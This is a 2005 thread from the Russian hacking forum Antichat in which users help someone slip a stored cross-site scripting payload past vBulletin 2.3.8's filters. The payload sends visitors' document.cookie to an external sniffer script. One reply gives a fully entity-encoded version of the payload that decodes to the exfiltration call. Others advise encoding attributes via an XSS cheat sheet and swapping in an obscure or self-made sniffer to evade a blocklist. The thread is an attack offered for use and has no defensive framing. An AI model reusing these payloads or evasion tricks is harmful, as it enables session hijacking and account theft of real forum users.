Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Проблема с XSS в vBulletin 2.x.x. Просьба помочь. (https://forum.antichat.xyz/showthread.php?t=11817)

ProblemaT 16.12.2005 15:01

Проблема с XSS в vBulletin 2.x.x. Просьба помочь.
 
Такое дело прописываю эту xss(изложено в этой теме http://forum.antichat.ru/showthread.php?t=5469) в форуме vBulletin версии 2.3.8 а она заменяется на такую вот хню aaa@aaa.aa"'s='' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));, появляются эти звёздочки. Кто нить может мне помочь, может её можно как нить запрятать.

Thesaurus 16.12.2005 15:04

Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

http://ha.ckers.org/xss.html

А вообще исходный код страницы дай.. :rolleyes:

ProblemaT 16.12.2005 15:10

Цитата:

Сообщение от Thesaurus
Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

http://ha.ckers.org/xss.html

А вообще исходный код страницы дай.. :rolleyes:

Тыпрочитай тему которую я указал выше.

ProblemaT 16.12.2005 15:13

Цитата:

Сообщение от Thesaurus

А где тут именно шифровать я не пойму?

Thesaurus 16.12.2005 15:18

Цитата:

Сообщение от ProblemaT
А где тут именно шифровать я не пойму?

Цитата:

Character Encoding Calculator
тут... :rolleyes:

ProblemaT 16.12.2005 15:53

Цитата:

Сообщение от Thesaurus
Resylitat koda svoego dai. Chto vidno v HTML?

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));</font></p>

Thesaurus 16.12.2005 16:11

Код HTML:

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='&#105&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#116&#104&#105&#115&#46&#115&#115&#115&#61&#110&#117&#108&#108" style=&#116&#111&#112&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#101&#118&#97&#108&#40&#116&#104&#105&#115&#46&#115&#115&#115&#41&#41&#59</font></p>

http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов. :rolleyes:

ProblemaT 16.12.2005 16:25

Цитата:

Сообщение от Thesaurus
Код HTML:

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='&#105&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#116&#104&#105&#115&#46&#115&#115&#115&#61&#110&#117&#108&#108" style=&#116&#111&#112&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#101&#118&#97&#108&#40&#116&#104&#105&#115&#46&#115&#115&#115&#41&#41&#59</font></p>

http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов. :rolleyes:

А какой брать код HTML (with semicolons) или HTML (without semicolons)?

ProblemaT 16.12.2005 16:35

Не выходит, пишет как простой текст.

k1b0rg 16.12.2005 18:12

если заменяет на звездочки значит чел, фильтрует через фильтр матов, тоесть вписываешь туда слова и он их заменяет на *
Секешь к чему я?
Цитата:

src='http://********
если он такое делает, значит он обрезает твой сайт, допустим многие форумы стали добавлять в мат античатовский сниффер, решаеться это "навождение косых умов" очень просто, ищещь не распространненый особо сниффер, в конце концов можешь сделать сам. пробобуй здесь netsec.ru там тебе персональный сниф дадут


Время: 20:17